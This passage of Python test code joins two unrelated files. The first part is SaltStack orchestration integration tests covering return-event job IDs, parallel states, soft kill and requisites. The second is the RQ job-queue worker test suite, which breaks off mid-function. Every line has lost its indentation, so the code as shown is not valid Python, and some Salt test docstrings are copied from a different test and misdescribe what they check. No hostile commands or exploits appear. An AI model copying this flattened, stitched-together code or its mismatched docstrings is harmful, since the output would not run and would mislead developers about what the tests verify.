self.master_d_dir = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master.d")
try:
os.makedirs(self.master_d_dir)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
self.conf = tempfile.NamedTemporaryFile(
mode="w", suffix=".conf", dir=self.master_d_dir, delete=True,
)
self.base_env = tempfile.mkdtemp(dir=RUNTIME_VARS.TMP)
self.addCleanup(shutil.rmtree, self.base_env)
self.addCleanup(self.conf.close)
for attr in ("timeout", "master_d_dir", "conf", "base_env"):
self.addCleanup(delattr, self, attr)
# Force a reload of the configuration now that our temp config file has
# been removed.
self.addCleanup(self.run_run_plus, "test.arg")
def alarm_handler(self, signal, frame):
raise Exception("Timeout of {} seconds reached".format(self.timeout))
def write_conf(self, data):
"""
Dump the config dict to the conf file
"""
self.conf.write(salt.utils.yaml.safe_dump(data, default_flow_style=False))
self.conf.flush()
@expensiveTest
def test_jid_in_ret_event(self):
"""
Test to confirm that the ret event for the orchestration contains the
jid for the jobs spawned.
"""
self.write_conf(
{"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
)
state_sls = os.path.join(self.base_env, "test_state.sls")
with salt.utils.files.fopen(state_sls, "w") as fp_:
fp_.write(
salt.utils.stringutils.to_str(
textwrap.dedent(
"""
date:
cmd.run
"""
)
)
)
orch_sls = os.path.join(self.base_env, "test_orch.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
salt.utils.stringutils.to_str(
textwrap.dedent(
"""
date_cmd:
salt.state:
- tgt: minion
- sls: test_state
ping_minion:
salt.function:
- name: test.ping
- tgt: minion
fileserver.file_list:
salt.runner
config.values:
salt.wheel
"""
)
)
)
listener = salt.utils.event.get_event(
"master",
sock_dir=self.master_opts["sock_dir"],
transport=self.master_opts["transport"],
opts=self.master_opts,
)
jid = self.run_run_plus("state.orchestrate", "test_orch").get("jid")
if jid is None:
raise Exception("jid missing from run_run_plus output")
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event["tag"] == "salt/run/{}/ret".format(jid):
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event["data"]["return"]["data"]["master"]
for job in ret:
self.assertTrue("__jid__" in ret[job])
break
finally:
del listener
signal.alarm(0)
@expensiveTest
def test_parallel_orchestrations(self):
"""
Test to confirm that the parallel state requisite works in orch
we do this by running 10 test.sleep's of 10 seconds, and insure it only takes roughly 10s
"""
self.write_conf(
{"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
)
orch_sls = os.path.join(self.base_env, "test_par_orch.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
{% for count in range(1, 20) %}
sleep {{ count }}:
module.run:
- name: test.sleep
- length: 10
- parallel: True
{% endfor %}
sleep 21:
module.run:
- name: test.sleep
- length: 10
- parallel: True
- require:
- module: sleep 1
"""
)
)
orch_sls = os.path.join(self.base_env, "test_par_orch.sls")
listener = salt.utils.event.get_event(
"master",
sock_dir=self.master_opts["sock_dir"],
transport=self.master_opts["transport"],
opts=self.master_opts,
)
start_time = time.time()
jid = self.run_run_plus("state.orchestrate", "test_par_orch").get("jid")
if jid is None:
raise Exception("jid missing from run_run_plus output")
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
received = False
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
# if we receive the ret for this job before self.timeout (60),
# the test is implicitly successful; if it were happening in serial it would be
# atleast 110 seconds.
if event["tag"] == "salt/run/{}/ret".format(jid):
received = True
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event["data"]["return"]["data"]["master"]
for state in ret:
data = ret[state]
# we expect each duration to be greater than 10s
self.assertTrue(data["duration"] > 10000)
break
# self confirm that the total runtime is roughly 30s (left 10s for buffer)
self.assertTrue((time.time() - start_time) < 40)
finally:
self.assertTrue(received)
del listener
signal.alarm(0)
@expensiveTest
def test_orchestration_soft_kill(self):
"""
Test to confirm that the parallel state requisite works in orch
we do this by running 10 test.sleep's of 10 seconds, and insure it only takes roughly 10s
"""
self.write_conf(
{"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
)
orch_sls = os.path.join(self.base_env, "two_stage_orch_kill.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
stage_one:
test.succeed_without_changes
stage_two:
test.fail_without_changes
"""
)
)
listener = salt.utils.event.get_event(
"master",
sock_dir=self.master_opts["sock_dir"],
transport=self.master_opts["transport"],
opts=self.master_opts,
)
mock_jid = "20131219120000000000"
self.run_run("state.soft_kill {} stage_two".format(mock_jid))
with patch("salt.utils.jid.gen_jid", MagicMock(return_value=mock_jid)):
jid = self.run_run_plus("state.orchestrate", "two_stage_orch_kill").get(
"jid"
)
if jid is None:
raise Exception("jid missing from run_run_plus output")
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
received = False
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
# Ensure that stage_two of the state does not run
if event["tag"] == "salt/run/{}/ret".format(jid):
received = True
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event["data"]["return"]["data"]["master"]
self.assertNotIn(
"test_|-stage_two_|-stage_two_|-fail_without_changes", ret
)
break
finally:
self.assertTrue(received)
del listener
signal.alarm(0)
@slowTest
def test_orchestration_with_pillar_dot_items(self):
"""
Test to confirm when using a state file that includes other state file, if
one of those state files includes pillar related functions that will not
be pulling from the pillar cache that all the state files are available and
the file_roots has been preserved. See issues #48277 and #46986.
"""
self.write_conf(
{"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
)
orch_sls = os.path.join(self.base_env, "main.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
include:
- one
- two
- three
"""
)
)
orch_sls = os.path.join(self.base_env, "one.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
{%- set foo = salt['saltutil.runner']('pillar.show_pillar') %}
placeholder_one:
test.succeed_without_changes
"""
)
)
orch_sls = os.path.join(self.base_env, "two.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
placeholder_two:
test.succeed_without_changes
"""
)
)
orch_sls = os.path.join(self.base_env, "three.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
placeholder_three:
test.succeed_without_changes
"""
)
)
orch_sls = os.path.join(self.base_env, "main.sls")
listener = salt.utils.event.get_event(
"master",
sock_dir=self.master_opts["sock_dir"],
transport=self.master_opts["transport"],
opts=self.master_opts,
)
jid = self.run_run_plus("state.orchestrate", "main").get("jid")
if jid is None:
raise salt.exceptions.SaltInvocationError(
"jid missing from run_run_plus output"
)
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
received = False
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event.get("tag", "") == "salt/run/{}/ret".format(jid):
received = True
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event["data"]["return"]["data"]["master"]
for state in ret:
data = ret[state]
# Each state should be successful
self.assertEqual(data["comment"], "Success!")
break
finally:
self.assertTrue(received)
del listener
signal.alarm(0)
@slowTest
def test_orchestration_onchanges_and_prereq(self):
"""
Test to confirm that the parallel state requisite works in orch
we do this by running 10 test.sleep's of 10 seconds, and insure it only takes roughly 10s
"""
self.write_conf(
{"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
)
orch_sls = os.path.join(self.base_env, "orch.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
manage_a_file:
salt.state:
- tgt: minion
- sls:
- orch.req_test
do_onchanges:
salt.function:
- tgt: minion
- name: test.ping
- onchanges:
- salt: manage_a_file
do_prereq:
salt.function:
- tgt: minion
- name: test.ping
- prereq:
- salt: manage_a_file
"""
)
)
listener = salt.utils.event.get_event(
"master",
sock_dir=self.master_opts["sock_dir"],
transport=self.master_opts["transport"],
opts=self.master_opts,
)
try:
jid1 = self.run_run_plus("state.orchestrate", "orch", test=True).get("jid")
# Run for real to create the file
self.run_run_plus("state.orchestrate", "orch").get("jid")
# Run again in test mode. Since there were no changes, the
# requisites should not fire.
jid2 = self.run_run_plus("state.orchestrate", "orch", test=True).get("jid")
finally:
try:
os.remove(os.path.join(RUNTIME_VARS.TMP, "orch.req_test"))
except OSError:
pass
assert jid1 is not None
assert jid2 is not None
tags = {"salt/run/{}/ret".format(x): x for x in (jid1, jid2)}
ret = {}
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event["tag"] in tags:
ret[tags.pop(event["tag"])] = self.repack_state_returns(
event["data"]["return"]["data"]["master"]
)
if not tags:
# If tags is empty, we've grabbed all the returns we
# wanted, so let's stop listening to the event bus.
break
finally:
del listener
signal.alarm(0)
for sls_id in ("manage_a_file", "do_onchanges", "do_prereq"):
# The first time through, all three states should have a None
# result, while the second time through, they should all have a
# True result.
assert (
ret[jid1][sls_id]["result"] is None
), "result of {} ({}) is not None".format(
sls_id, ret[jid1][sls_id]["result"]
)
assert (
ret[jid2][sls_id]["result"] is True
), "result of {} ({}) is not True".format(
sls_id, ret[jid2][sls_id]["result"]
)
# The file.managed state should have shown changes in the test mode
# return data.
assert ret[jid1]["manage_a_file"]["changes"]
# After the file was created, running again in test mode should have
# shown no changes.
assert not ret[jid2]["manage_a_file"]["changes"], ret[jid2]["manage_a_file"][
"changes"
]
|
test_worker.py | # -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import os
import shutil
import signal
import subprocess
import sys
import time
import zlib
from datetime import datetime, timedelta
from multiprocessing import Process
from time import sleep
from unittest import skipIf
import pytest
import mock
from mock import Mock
from tests import RQTestCase, slow
from tests.fixtures import (
access_self, create_file, create_file_after_timeout, div_by_zero, do_nothing,
kill_worker, long_running_job, modify_self, modify_self_and_error,
run_dummy_heroku_worker, save_key_ttl, say_hello, say_pid,
)
from rq import Queue, SimpleWorker, Worker, get_current_connection
from rq.compat import as_text, PY2
from rq.job import Job, JobStatus
from rq.registry import StartedJobRegistry, FailedJobRegistry, FinishedJobRegistry
from rq.suspension import resume, suspend
from rq.utils import utcnow
from rq.version import VERSION
from rq.worker import HerokuWorker, WorkerStatus
class CustomJob(Job):
pass
class CustomQueue(Queue):
pass
class TestWorker(RQTestCase):
def test_create_worker(self):
"""Worker creation using various inputs."""
# With single string argument
w = Worker('foo')
self.assertEqual(w.queues[0].name, 'foo')
# With list of strings
w = Worker(['foo', 'bar'])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
self.assertEqual(w.queue_keys(), [w.queues[0].key, w.queues[1].key])
self.assertEqual(w.queue_names(), ['foo', 'bar'])
# With iterable of strings
w = Worker(iter(['foo', 'bar']))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# Also accept byte strings in Python 2
if PY2:
# With single byte string argument
w = Worker(b'foo')
self.assertEqual(w.queues[0].name, 'foo')
# With list of byte strings
w = Worker([b'foo', b'bar'])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With iterable of byte strings
w = Worker(iter([b'foo', b'bar']))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With single Queue
w = Worker(Queue('foo'))
self.assertEqual(w.queues[0].name, 'foo')
# With iterable of Queues
w = Worker(iter([Queue('foo'), Queue('bar')]))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With list of Queues
w = Worker([Queue('foo'), Queue('bar')])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With string and serializer
w = Worker('foo', serializer=json)
self.assertEqual(w.queues[0].name, 'foo')
# With queue having serializer
w = Worker(Queue('foo'), serializer=json)
self.assertEqual(w.queues[0].name, 'foo')
def test_work_and_quit(self):
"""Worker processes work, then quits."""
fooq, barq = Queue('foo'), Queue('bar')
w = Worker([fooq, barq])
self.assertEqual(
w.work(burst=True), False,
'Did not expect any work on the queue.'
)
fooq.enqueue(say_hello, name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
def test_worker_all(self):
"""Worker.all() works properly"""
foo_queue = Queue('foo')
bar_queue = Queue('bar')
w1 = Worker([foo_queue, bar_queue], name='w1')
w1.register_birth()
w2 = Worker([foo_queue], name='w2')
w2.register_birth()
self.assertEqual(
set(Worker.all(connection=foo_queue.connection)),
set([w1, w2])
)
self.assertEqual(set(Worker.all(queue=foo_queue)), set([w1, w2]))
self.assertEqual(set(Worker.all(queue=bar_queue)), set([w1]))
w1.register_death()
w2.register_death()
def test_find_by_key(self):
"""Worker.find_by_key restores queues, state and job_id."""
queues = [Queue('foo'), Queue('bar')]
w = Worker(queues)
w.register_death()
w.register_birth()
w.set_state(WorkerStatus.STARTED)
worker = Worker.find_by_key(w.key)
self.assertEqual(worker.queues, queues)
self.assertEqual(worker.get_state(), WorkerStatus.STARTED)
self.assertEqual(worker._job_id, None)
self.assertTrue(worker.key in Worker.all_keys(worker.connection))
self.assertEqual(worker.version, VERSION)
# If worker is gone, its keys should also be removed
worker.connection.delete(worker.key)
Worker.find_by_key(worker.key)
self.assertFalse(worker.key in Worker.all_keys(worker.connection))
self.assertRaises(ValueError, Worker.find_by_key, 'foo')
def test_worker_ttl(self):
"""Worker ttl."""
w = Worker([])
w.register_birth()
[worker_key] = self.testconn.smembers(Worker.redis_workers_keys)
self.assertIsNotNone(self.testconn.ttl(worker_key))
w.register_death()
def test_work_via_string_argument(self):
"""Worker processes work fed via string arguments."""
q = Queue('foo')
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
self.assertEqual(job.result, 'Hi there, Frank!')
def test_job_times(self):
"""job times are set correctly."""
q = Queue('foo')
w = Worker([q])
before = utcnow()
before = before.replace(microsecond=0)
job = q.enqueue(say_hello)
self.assertIsNotNone(job.enqueued_at)
self.assertIsNone(job.started_at)
self.assertIsNone(job.ended_at)
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
self.assertEqual(job.result, 'Hi there, Stranger!')
after = utcnow()
job.refresh()
self.assertTrue(
before <= job.enqueued_at <= after,
'Not %s <= %s <= %s' % (before, job.enqueued_at, after)
)
self.assertTrue(
before <= job.started_at <= after,
'Not %s <= %s <= %s' % (before, job.started_at, after)
)
self.assertTrue(
before <= job.ended_at <= after,
'Not %s <= %s <= %s' % (before, job.ended_at, after)
)
def test_work_is_unreadable(self):
"""Unreadable jobs are put on the failed job registry."""
q = Queue()
self.assertEqual(q.count, 0)
# NOTE: We have to fake this enqueueing for this test case.
# What we're simulating here is a call to a function that is not
# importable from the worker process.
job = Job.create(func=div_by_zero, args=(3,), origin=q.name)
job.save()
job_data = job.data
invalid_data = job_data.replace(b'div_by_zero', b'nonexisting')
assert job_data != invalid_data
self.testconn.hset(job.key, 'data', zlib.compress(invalid_data))
# We use the low-level internal function to enqueue any data (bypassing
# validity checks)
q.push_job_id(job.id)
self.assertEqual(q.count, 1)
# All set, we're going to process it
w = Worker([q])
w.work(burst=True) # should silently pass
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
def test_heartbeat(self):
"""Heartbeat saves last_heartbeat"""
q = Queue()
w = Worker([q])
w.register_birth()
self.assertEqual(str(w.pid), as_text(self.testconn.hget(w.key, 'pid')))
self.assertEqual(w.hostname,
as_text(self.testconn.hget(w.key, 'hostname')))
last_heartbeat = self.testconn.hget(w.key, 'last_heartbeat')
self.assertIsNotNone(self.testconn.hget(w.key, 'birth'))
self.assertTrue(last_heartbeat is not None)
w = Worker.find_by_key(w.key)
self.assertIsInstance(w.last_heartbeat, datetime)
# worker.refresh() shouldn't fail if last_heartbeat is None
# for compatibility reasons
self.testconn.hdel(w.key, 'last_heartbeat')
w.refresh()
# worker.refresh() shouldn't fail if birth is None
# for compatibility reasons
self.testconn.hdel(w.key, 'birth')
w.refresh()
@slow
def test_heartbeat_busy(self):
"""Periodic heartbeats while horse is busy with long jobs"""
q = Queue()
w = Worker([q], job_monitoring_interval=5)
for timeout, expected_heartbeats in [(2, 0), (7, 1), (12, 2)]:
job = q.enqueue(long_running_job,
args=(timeout,),
job_timeout=30,
result_ttl=-1)
with mock.patch.object(w, 'heartbeat', wraps=w.heartbeat) as mocked:
w.execute_job(job, q)
self.assertEqual(mocked.call_count, expected_heartbeats)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_work_fails(self):
"""Failing jobs are put on the failed queue."""
q = Queue()
self.assertEqual(q.count, 0)
# Action
job = q.enqueue(div_by_zero)
self.assertEqual(q.count, 1)
# keep for later
enqueued_at_date = str(job.enqueued_at)
w = Worker([q])
w.work(burst=True) # should silently pass
# Postconditions
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
self.assertEqual(w.get_current_job_id(), None)
# Check the job
job = Job.fetch(job.id)
self.assertEqual(job.origin, q.name)
# Should be the original enqueued_at date, not the date of enqueueing
# to the failed queue
self.assertEqual(str(job.enqueued_at), enqueued_at_date)
self.assertTrue(job.exc_info) # should contain exc_info
def test_statistics(self):
"""Successful and failed job counts are saved properly"""
queue = Queue()
job = queue.enqueue(div_by_zero)
worker = Worker([queue])
worker.register_birth()
self.assertEqual(worker.failed_job_count, 0)
self.assertEqual(worker.successful_job_count, 0)
self.assertEqual(worker.total_working_time, 0)
registry = StartedJobRegistry(connection=worker.connection)
job.started_at = utcnow()
job.ended_at = job.started_at + timedelta(seconds=0.75)
worker.handle_job_failure(job)
worker.handle_job_success(job, queue, registry)
worker.refresh()
self.assertEqual(worker.failed_job_count, 1)
self.assertEqual(worker.successful_job_count, 1)
self.assertEqual(worker.total_working_time, 1.5) # 1.5 seconds
worker.handle_job_failure(job)
worker.handle_job_success(job, queue, registry)
worker.refresh()
self.assertEqual(worker.failed_job_count, 2)
self.assertEqual(worker.successful_job_count, 2)
self.assertEqual(worker.total_working_time, 3.0)
def test_total_working_time(self):
"""worker.total_working_time is stored properly"""
queue = Queue()
job = queue.enqueue(long_running_job, 0.05)
worker = Worker([queue])
worker.register_birth()
worker.perform_job(job, queue)
worker.refresh()
# total_working_time should be a little bit more than 0.05 seconds
self.assertGreaterEqual(worker.total_working_time, 0.05)
# in multi-user environments delays might be unpredictable,
# please adjust this magic limit accordingly in case if It takes even longer to run
self.assertLess(worker.total_working_time, 1)
def test_max_jobs(self):
"""Worker exits after number of jobs complete."""
queue = Queue()
job1 = queue.enqueue(do_nothing)
job2 = queue.enqueue(do_nothing)
worker = Worker([queue])
worker.work(max_jobs=1)
self.assertEqual(JobStatus.FINISHED, job1.get_status())
self.assertEqual(JobStatus.QUEUED, job2.get_status())
def test_disable_default_exception_handler(self):
"""
Job is not moved to FailedJobRegistry when default custom exception
handler is disabled.
"""
queue = Queue(name='default', connection=self.testconn)
job = queue.enqueue(div_by_zero)
worker = Worker([queue], disable_default_exception_handler=False)
worker.work(burst=True)
registry = FailedJobRegistry(queue=queue)
self.assertTrue(job in registry)
# Job is not added to FailedJobRegistry if
# disable_default_exception_handler is True
job = queue.enqueue(div_by_zero)
worker = Worker([queue], disable_default_exception_handler=True)
worker.work(burst=True)
self.assertFalse(job in registry)
def test_custom_exc_handling(self):
"""Custom exception handling."""
def first_handler(job, *exc_info):
job.meta = {'first_handler': True}
job.save_meta()
return True
def second_handler(job, *exc_info):
job.meta.update({'second_handler': True})
job.save_meta()
def black_hole(job, *exc_info):
# Don't fall through to default behaviour (moving to failed queue)
return False
q = Queue()
self.assertEqual(q.count, 0)
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=first_handler)
w.work(burst=True)
# Check the job
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=[first_handler, second_handler])
w.work(burst=True)
# Both custom exception handlers are run
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
self.assertTrue(job.meta['second_handler'])
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=[first_handler, black_hole,
second_handler])
w.work(burst=True)
# second_handler is not run since it's interrupted by black_hole
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
self.assertEqual(job.meta.get('second_handler'), None)
def test_cancelled_jobs_arent_executed(self):
"""Cancelling jobs."""
SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa
try:
# Remove the sentinel if it is leftover from a previous test run
os.remove(SENTINEL_FILE)
except OSError as e:
if e.errno != 2:
raise
q = Queue()
job = q.enqueue(create_file, SENTINEL_FILE)
# Here, we cancel the job, so the sentinel file may not be created
self.testconn.delete(job.key)
w = Worker([q])
w.work(burst=True)
assert q.count == 0
# Should not have created evidence of execution
self.assertEqual(os.path.exists(SENTINEL_FILE), False)
@slow # noqa
def test_timeouts(self):
"""Worker kills jobs after timeout."""
sentinel_file = '/tmp/.rq_sentinel'
q = Queue()
w = Worker([q])
# Put it on the queue with a timeout value
res = q.enqueue(create_file_after_timeout,
args=(sentinel_file, 4),
job_timeout=1)
try:
os.unlink(sentinel_file)
except OSError as e:
if e.errno == 2:
pass
self.assertEqual(os.path.exists(sentinel_file), False)
w.work(burst=True)
self.assertEqual(os.path.exists(sentinel_file), False)
# TODO: Having to do the manual refresh() here is really ugly!
res.refresh()
self.assertIn('JobTimeoutException', as_text(res.exc_info))
def test_worker_sets_result_ttl(self):
"""Ensure that Worker properly sets result_ttl for individual jobs."""
q = Queue()
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w = Worker([q])
self.assertIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertNotEqual(self.testconn.ttl(job.key), 0)
self.assertNotIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
# Job with -1 result_ttl don't expire
job = q.enqueue(say_hello, args=('Frank',), result_ttl=-1)
w = Worker([q])
self.assertIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertEqual(self.testconn.ttl(job.key), -1)
self.assertNotIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
# Job with result_ttl = 0 gets deleted immediately
job = q.enqueue(say_hello, args=('Frank',), result_ttl=0)
w = Worker([q])
self.assertIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertEqual(self.testconn.get(job.key), None)
self.assertNotIn(job.get_id().encode('utf-8'), self.testconn.lrange(q.key, 0, -1))
def test_worker_sets_job_status(self):
"""Ensure that worker correctly sets job status."""
q = Queue()
w = Worker([q])
job = q.enqueue(say_hello)
self.assertEqual(job.get_status(), JobStatus.QUEUED)
self.assertEqual(job.is_queued, True)
self.assertEqual(job.is_finished, False)
self.assertEqual(job.is_failed, False)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
self.assertEqual(job.is_queued, False)
self.assertEqual(job.is_finished, True)
self.assertEqual(job.is_failed, False)
# Failed jobs should set status to "failed"
job = q.enqueue(div_by_zero, args=(1,))
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FAILED)
self.assertEqual(job.is_queued, False)
self.assertEqual(job.is_finished, False)
self.assertEqual(job.is_failed, True)
def test_job_dependency(self):
"""Enqueue dependent jobs only if their parents don't fail"""
q = Queue()
w = Worker([q])
parent_job = q.enqueue(say_hello, result_ttl=0)
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
parent_job = q.enqueue(div_by_zero)
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertNotEqual(job.get_status(), JobStatus.FINISHED)
def test_get_current_job(self):
"""Ensure worker.get_current_job() works properly"""
q = Queue()
worker = Worker([q])
job = q.enqueue_call(say_hello)
self.assertEqual(self.testconn.hget(worker.key, 'current_job'), None)
worker.set_current_job_id(job.id)
self.assertEqual(
worker.get_current_job_id(),
as_text(self.testconn.hget(worker.key, 'current_job'))
)
self.assertEqual(worker.get_current_job(), job)
def test_custom_job_class(self):
"""Ensure Worker accepts custom job class."""
q = Queue()
worker = Worker([q], job_class=CustomJob)
self.assertEqual(worker.job_class, CustomJob)
def test_custom_queue_class(self):
"""Ensure Worker accepts custom queue class."""
q = CustomQueue()
worker = Worker([q], queue_class=CustomQueue)
self.assertEqual(worker.queue_class, CustomQueue)
def test_custom_queue_class_is_not_global(self):
"""Ensure Worker custom queue class is not global."""
q = CustomQueue()
worker_custom = Worker([q], queue_class=CustomQueue)
q_generic = Queue()
worker_generic = Worker([q_generic])
self.assertEqual(worker_custom.queue_class, CustomQueue)
self.assertEqual(worker_generic.queue_class, Queue)
self.assertEqual(Worker.queue_class, Queue)
def test_custom_job_class_is_not_global(self):
"""Ensure Worker custom job class is not global."""
q = Queue()
worker_custom = Worker([q], job_class=CustomJob)
q_generic = Queue()
worker_generic = Worker([q_generic])
self.assertEqual(worker_custom.job_class, CustomJob)
self.assertEqual(worker_generic.job_class, Job)
self.assertEqual(Worker.job_class, Job)
def test_work_via_simpleworker(self):
"""Worker processes work, with forking disabled,
then returns."""
fooq, barq = Queue('foo'), Queue('bar')
w = SimpleWorker([fooq, barq])
self.assertEqual(w.work(burst=True), False,
'Did not expect any work on the queue.')
job = fooq.enqueue(say_pid)
self.assertEqual(w.work(burst=True), True,
'Expected at least some work done.')
self.assertEqual(job.result, os.getpid(),
'PID mismatch, fork() is not supposed to happen here')
def test_simpleworker_heartbeat_ttl(self):
"""SimpleWorker's key must last longer than job.timeout when working"""
queue = Queue('foo')
worker = SimpleWorker([queue])
job_timeout = 300
job = queue.enqueue(save_key_ttl, worker.key, job_timeout=job_timeout)
worker.work(burst=True)
job.refresh()
self.assertGreater(job.meta['ttl'], job_timeout)
def test_prepare_job_execution(self):
"""Prepare job execution does the necessary bookkeeping."""
queue = Queue(connection=self.testconn)
job = queue.enqueue(say_hello)
worker = Worker([queue])
worker.prepare_job_execution(job)
# Updates working queue
registry = StartedJobRegistry(connection=self.testconn)
self.assertEqual(registry.get_job_ids(), [job.id])
# Updates worker statuses
self.assertEqual(worker.get_state(), 'busy')
self.assertEqual(worker.get_current_job_id(), job.id)
def test_prepare_job_execution_inf_timeout(self):
"""Prepare job execution handles infinite job timeout"""
queue = Queue(connection=self.testconn)
job = queue.enqueue(long_running_job,
args=(1,),
job_timeout=-1)
worker = Worker([queue])
worker.prepare_job_execution(job)
# Updates working queue
registry = StartedJobRegistry(connection=self.testconn)
self.assertEqual(registry.get_job_ids(), [job.id])
# Score in queue is +inf
self.assertEqual(self.testconn.zscore(registry.key, job.id), float('Inf'))
def test_work_unicode_friendly(self):
"""Worker processes work with unicode description, then quits."""
q = Queue('foo')
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='Adam',
description='你好 世界!')
self.assertEqual(w.work(burst=True), True,
'Expected at least some work done.')
self.assertEqual(job.result, 'Hi there, Adam!')
self.assertEqual(job.description, '你好 世界!')
def test_work_log_unicode_friendly(self):
"""Worker process work with unicode or str other than pure ascii content,
logging work properly"""
q = Queue("foo")
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='阿达姆',
description='你好 世界!')
w.work(burst=True)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
job = q.enqueue('tests.fixtures.say_hello_unicode', name='阿达姆',
description='你好 世界!')
w.work(burst=True)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_suspend_worker_execution(self):
"""Test Pause Worker Execution"""
SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa
try:
# Remove the sentinel if it is leftover from a previous test run
os.remove(SENTINEL_FILE)
except OSError as e:
if e.errno != 2:
raise
q = Queue()
q.enqueue(create_file, SENTINEL_FILE)
w = Worker([q])
suspend(self.testconn)
w.work(burst=True)
assert q.count == 1
# Should not have created evidence of execution
self.assertEqual(os.path.exists(SENTINEL_FILE), False)
resume(self.testconn)
w.work(burst=True)
assert q.count == 0
self.assertEqual(os.path.exists(SENTINEL_FILE), True)
@slow
def test_suspend_with_duration(self):
q = Queue()
for _ in range(5):
q.enqueue(do_nothing)
w = Worker([q])
# This suspends workers for working for 2 second
suspend(self.testconn, 2)
# So when this burst of work happens the queue should remain at 5
w.work(burst=True)
assert q.count == 5
sleep(3)
# The suspension should be expired now, and a burst of work should now clear the queue
w.work(burst=True)
assert q.count == 0
def test_worker_hash_(self):
"""Workers are hashed by their .name attribute"""
q = Queue('foo')
w1 = Worker([q], name="worker1")
w2 = Worker([q], name="worker2")
w3 = Worker([q], name="worker1")
worker_set = set([w1, w2, w3])
self.assertEqual(len(worker_set), 2)
def test_worker_sets_birth(self):
"""Ensure worker correctly sets worker birth date."""
q = Queue()
w = Worker([q])
w.register_birth()
birth_date = w.birth_date
self.assertIsNotNone(birth_date)
self.assertEqual(type(birth_date).__name__, 'datetime')
def test_worker_sets_death(self):
"""Ensure worker correctly sets worker death date."""
q = Queue()
w = Worker([q])
w.register_death()
death_date = w.death_date
